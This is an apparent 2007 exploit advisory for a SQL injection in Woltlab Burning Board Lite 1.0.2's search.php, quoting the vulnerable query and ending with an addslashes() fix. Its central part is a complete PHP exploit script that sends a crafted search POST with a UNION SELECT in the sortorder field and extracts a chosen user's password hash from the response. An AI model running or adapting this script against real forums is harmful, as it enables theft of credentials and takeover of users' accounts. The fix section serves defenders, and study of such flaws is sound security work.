
wbb-sql.txt

Posted on 21 December 2007

Woltlab Burning Board Lite (1.0.2) has a SQL injection vulnerability in the file search.php, lines 510-515:

if(!$savepostids) eval("error(\"".$tpl->get("error_searchnoresult")."\");");
$result=$db->query_first("SELECT searchid FROM bb".$n."_searchs WHERE postids='$savepostids' AND showposts='$_POST[showposts]' AND sortby='$_POST[sortby]' AND sortorder='$_POST[sortorder]' AND userid='$wbbuserdata[userid]' AND ipaddress='$REMOTE_ADDR'");
if($result['searchid']) {
    header("Location: search.php?searchid=$result[searchid]&sid=$session[hash]");
    exit();
}

There is no addslashes() on $_POST[showposts], $_POST[sortby] and $_POST[sortorder], so the values are inserted into the query as the user sent them.

== Exploit ==

<?php
$host         = $argv[1];
$path         = $argv[2];
$searchstring = $argv[3];
$userid       = $argv[4];

if ($argc <= 4) {
    echo "Usage: filename.php [host] [path] [searchstring] [user-id]\n";
    echo "Examples:\n";
    echo "php filename.php localhost /wbblite/search.php Computer 1\n";
    echo "php filename.php localhost /search.php Board 1\n";
    die;
}

// POST body of the search form; the sortorder field carries the injected query
$sqlinjecting = "searchstring=$searchstring&searchuser=&name_exactly=1&boardids%5B%5D=*&topiconly=0&showposts=0&searchdate=0&beforeafter=after&sortby=lastpost&sortorder=%27%20UNION%20SELECT%20password%20FROM%20bb1_users%20WHERE%20userid=$userid%20/*&send=send&sid=&submit=Suchen";

$con = fsockopen($host, 80);
echo("==Woltlab Burning Board LITE SQL-Injection Exploit founded and coded by NBBN.\n");
sleep(1);
fputs($con, "POST $path HTTP/1.1\r\n");
fputs($con, "Host: $host\r\n");
fputs($con, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($con, "Content-length: " . strlen($sqlinjecting) . "\r\n");
fputs($con, "Connection: close\r\n\r\n");
fputs($con, "$sqlinjecting\r\n");

// read the whole response; the redirect target contains the selected value
$res = '';
while (!feof($con)) {
    $res .= fgets($con, 128);
}
echo("Well done...\n");
fclose($con);
echo $res;
echo "The password-hash is in search.php?searchid=[Hash]\n";
$the_hash = substr($res, strpos($res, 'searchid=') + 9, 32);
echo "Hash: $the_hash\n";
?>

== Fix ==

Escape the three POST fields before they are placed in the query (the concatenation has to leave the double-quoted string, otherwise addslashes() is never called):

if(!$savepostids) eval("error(\"".$tpl->get("error_searchnoresult")."\");");
$result=$db->query_first("SELECT searchid FROM bb".$n."_searchs WHERE postids='$savepostids' AND showposts='".addslashes($_POST[showposts])."' AND sortby='".addslashes($_POST[sortby])."' AND sortorder='".addslashes($_POST[sortorder])."' AND userid='$wbbuserdata[userid]' AND ipaddress='$REMOTE_ADDR'");
if($result['searchid']) {
    header("Location: search.php?searchid=$result[searchid]&sid=$session[hash]");
    exit();
}
